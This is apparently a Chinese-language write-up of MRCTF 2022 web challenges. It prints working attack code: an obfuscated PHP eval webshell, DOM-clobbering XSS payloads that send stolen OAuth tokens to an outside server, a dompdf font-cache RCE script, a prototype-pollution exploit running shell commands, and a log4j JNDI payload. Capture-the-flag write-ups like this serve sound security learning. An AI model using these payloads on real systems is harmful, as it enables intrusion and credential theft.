[MRCTF 2022]web题目复现

[MRCTF 2022]web题目复现

文章目录

  • WEB
    • webcheckin
    • God_of_GPA
      • 非预期
        • 非预期1-夺舍bot
        • 非预期2-oauth xss
        • 非预期3-CSRF
    • Tprint
    • hurry_up
  • BONUS
    • Java_mem_shell_Basic
    • Java_mem_shell_Filter

WEB

webcheckin

一个文件上传点,可以上传webshell但是有检测,这里用二进制绕过

<?php
class KUYE{
        public $DAXW = null;
        public $LRXV = null;
        function __construct(){
        $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 1001111 1010011 1010100 1011011 1111010 1100101 1110010 1101111 1011101 101001 111011';
        $this->LRXV = @BinToStr($this->DAXW);
        @eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
        }}
new KUYE();
function BinToStr($str){
    $arr = explode(' ', $str);
    foreach($arr as &$v){
        $v = pack("H".strlen(base_convert($v, 2, 16)), base_convert($v, 2, 16));
    }
    return join('', $arr);
}
?>

image-20220423144410500

最后flag:

zero=system("find /var -type f | xargs grep 'MRCTF{'");

/var/log/dpkg.log

God_of_GPA

题目由两个web组成:博仁科技统一身份认证和博仁课堂。统一身份认证在登录状态下时,博仁课堂可以直接一键登录。

登录到博仁课堂后可以查看自己的成绩,有一个神秘按钮,点击进入后门界面

这里可是zbr专属的后门通道!想啥呢!

说明需要特殊权限才能使用

再看server端,给了一个和zbr互动的界面(此处提示了bot的浏览器是chrome,跟之后的xss有关)

image-20220426221020647

查看博人树洞的前端代码,发现一段可疑代码

<script>
    let Img =  window.MyImg || {src: 'https://up-gz.zsyts.cn/wp-content/uploads/2023/05/cd5452c6544800e0cc8e7cf13b8c6673.png'}
    let Container = document.createElement("div");
    Container.innerHTML = '<img class="avatar" src="' + Img.src + '">';
    document.body.appendChild(Container);
  </script>

此处可以利用dom xss,参考-使用 Dom Clobbering 扩展 XSS

写两篇xss文章,让bot访问认证页之后重定向到另一篇xss,另一篇xss接到token之后再发送到vps

p1

<a id=MyImg><a id=MyImg name=src href='cid:ibukifalling"οnerrοr="javascript:function getQueryVariable(variable)
        {
               var query = window.location.search.substring(1);
               var vars = query.split(`&`);
               for (var i=0;i<vars.length;i++) {
                       var pair = vars[i].split(`=`);
                       if(pair[0] == variable){return pair[1];}
               }
               return(false);
        }
        var token = getQueryVariable(`token`);
        console.log(token);
        document.write(`<img src=http://yourip/token=`+token+` >`);
        "//'></a>

p2

<a id=MyImg><a id=MyImg name=src href='cid:ibukifalling"οnerrοr="javascript:setTimeout(function(){location.href=`http://brtserver.node3.mrctf.fun/oauth/authorize?redirect_uri=http://brtclient.node3.mrctf.fun/view/part1uuid`},1000)"//'></a>

向bot发送part2的uuid,part2会访问oauth认证地址并且重定向到part1,part1再发送到远程监听服务器上,以此获得token

image-20220426231937613

rFANjznMf279H2WdhX6NEPPWazGPKibk

此时我们本地访问

http://brtclient.node3.mrctf.fun/login?token=rFANjznMf279H2WdhX6NEPPWazGPKibk

查看成绩即可获得flag

image-20220426232201252

当然将两个脚本融合一下变成一个也是可以的

<div id="scrip">
console.log("injected");
let uri = window.location.href + "";
if (uri.indexOf('token') > -1){
    location.href="//106.14.15.50/flag?f="+encodeURIComponent(uri)
}else{
    location.href="http://brtserver.node3.mrctf.fun/oauth/authorize?redirect_uri="+window.location.href
}
</div>
<img src='data:,"οnerrοr="eval(scrip.innerText)' id="MyImg" />

非预期

这里贴一下出题人的wp

非预期1-夺舍bot

由于出题人在写正则的时候忘记写开头和结尾匹配,导致发送uuid的校验出现问题

img

如果向bot发送形如uuid/../../login?token=yourtoken的uuid,可以令bot在博仁课堂端登录上选手本人的账户

而登录成功的页面提示信息是直接拼接用户名的

img

所以可以在用户名处进行xss…直接把payload写在用户名里

因为此时bot在server端仍然是管理员账号,在用户名的xss中令bot先访问brtserver.node3.mrctf.fun/oauth/authorize可以拿回管理员权限,之后就可以打CSRF了

非预期2-oauth xss

这个比上面那个稍微好一点,但依然震撼出题人一整年……并且也有多队打出了这个非预期……

由于跳转界面也是直接拼接的redirect_uri,而redirect_uri后面的路径是可以随便写的,所以可以在redirect_uri处进行xss

img

在文章的xss处令bot访问http://brtserver.node2.buptmerak.cn/oauth/authorize? redirect_uri=http://brtclient.node2.buptmerak.cn/";window.location="http://vps/可以直接拿到token,这样就不用再弹一次了

非预期3-CSRF

非预期1里提到,bot访问/oauth/authorize可以在博仁课堂端管理员登录,那么在文章xss处直接打CSRF也是可以的

Tprint

TP框架,扫一下,有/runtime/log/202204/23.log

发现一个Admin控制器,直接index.php?s=Admin

image-20220426234451999

这里存在一个文件上传的点,根目录有个指定文件名输出pdf的接口

/public/index.php?s=Printer/print&page=/public/storage/static/20220424/8af39fce798b3cd3bf2f7155488f9808.css

主要就是利用dompdf在解析html文件时会默认加载远程css并且进一步缓存远程字体文件的问题。因为未对字体文件后缀进行过滤,导致可以直接缓存任意文件,并且缓存文件名是可以计算出来的。这就导致了一个间接的文件写漏洞。

因为本题不出网,设置了一个文件上传点,通过上传html的方式来进行css注入。我们只需要把恶意字体文件/恶意css/恶意html文件上传上去然后打印我们的恶意文件就能同样触发这个攻击链。

import requests
from hashlib import md5
url = "http://140d90fe-e364-438e-b567-e4c7b3e535e5.node1.mrctf.fun:81"
font_name = "eki"
def print2pdf(page):
    param= {
        "s":"Printer/print",
        "page":page
    }
    res = requests.get(f"{url}/public/index.php",params=param)
    return res
def upload(filename,raw):
    data = {
        "name":"avatar",
        "type":"image",
    }
    res = requests.post(f"{url}/public/index.php?s=admin/upload",data=data,files={"file":(filename,raw,"image/png")})
    return res.json()["result"]
exp_font = "./exp.php"
php_location = upload("exp.php",open(exp_font,"rb").read())
print(f"php_location=>{php_location}")
exp_css = f"""
@font-face{{
    font-family:'{font_name}';
    src:url('http://localhost:81{php_location}');
    font-weight:'normal';
    font-style:'normal';
}}
"""
css_location = upload("exp.css",exp_css)
print(f"css_location=>{css_location}")
html = f"""
<link rel=stylesheet href='http://localhost:81{css_location}'><span style="font-family:{font_name};">5678</span>
"""
html_location = upload("exp.html",html)
payload = "/storage/"
print(f"html_location=>{html_location}")
p = html_location
print(p)
res  = print2pdf(p)
open("out.pdf","wb").write(res.content)
md5helper = md5()
md5helper.update(f"http://localhost:81{php_location}".encode())
remote_path = f"/vendor/dompdf/dompdf/lib/fonts/{font_name}-normal_{md5helper.hexdigest()}.php"
print(f"remote_path=>{remote_path}")
res = requests.get(url+remote_path)
print(res.text)

image-20220427094541603

完整文件我github仓库里有

hurry_up

条件竞争进行原型污染RCE。

(请求A访问/,清除Object上的原型污染,并等待100毫秒) -> (请求B进行原型污染) -> (请求A等待结束,进行ejs模板渲染,原型污染RCE,回显flag)

import requests as requ
import time
import os
requests = requ.Session()
proxies = {}
server = "http://hurry.node2.buptmerak.cn"
def urlencode(sth):
    result = ""
    for i in sth:
        result += "%"
        result += "%02x" % ord(i)
    return result
def add(paths,data):
    url = server + "/hide?a=1"
    for item in paths:
        url += f"&path[]={item}"
    url += "&value="+urlencode(data)
    r = requests.get(url,proxies=proxies)
    return r
def main():
    payload="ee;return process.mainModule.require('child_process').execSync('cat /flag && echo successed').toString();//"
    while 1:
        _ = (add(['__proto__','outputFunctionName'],payload))
if __name__ == '__main__':
    main()
import requests as requ
import time
import os
server = "http://hurry.node2.buptmerak.cn"
requests = requ.Session()
def view():
    return requests.get(server)
def main():
    while 1:
        data = view()
        if 'html' not in data.text:
        #if 'successed' in data.text:
            print(data.text)
main()

image-20220427003904197

BONUS

Java_mem_shell_Basic

进入是一个tomcat

image-20220427120355931

后台弱口令tomcat/tomcat

打包一个冰歇马上传

jar -cvf shell1.war *

冰蝎连接

image-20220427122516992

flag在tomcat首次编译jsp的tomcat/work目录里threatbook_jsp.java

/usr/local/apache-tomcat-8.0.12/work/Catalina/localhost/ROOT/org/apache/jsp/threatbook_jsp.java

image-20220427122704619

Java_mem_shell_Filter

登录框用户名处有log4j

name=${jndi:rmi://xxxxx/exp}&password=admin

jndi反弹shell,没找到flag,将内存dump出来

jmap -dump:format=b,file=e.bin <pid>

生成e.bin后strings就能看到flag

image-20220427125359204

参考:

https://positive.security/blog/dompdf-rce

https://blog.wm-team.cn/index.php/archives/18/

https://ghostasky.github.io/2022/03/19/dompdf%200day(RCE)%E5%A4%8D%E7%8E%B0/

https://mp.weixin.qq.com/s?__biz=MzI3NTg2NTk5Mg==&mid=2247484132&idx=1&sn=55fdb98a839bd2e0a8d14934a0fef757&chksm=eb7f0a03dc0883155a73e1c9326e28be458aa55b7847c5390a43df8702403facb84ab0a06a04&mpshare=1&scene=23&srcid=0425FBJKvWlNewXNv00ett0i&sharer_sharetime=1650892617392&sharer_shareid=ef2a828dd213b828cd3fe897350642f0#rd

https://y4tacker.github.io/2022/04/24/year/2022/4/2022MRCTF-Java%E9%83%A8%E5%88%86/#Java-mem-shell-Basic

                       

点击阅读全文

上一篇 2023年 5月 25日 am11:06
下一篇 2023年 5月 25日 am11:07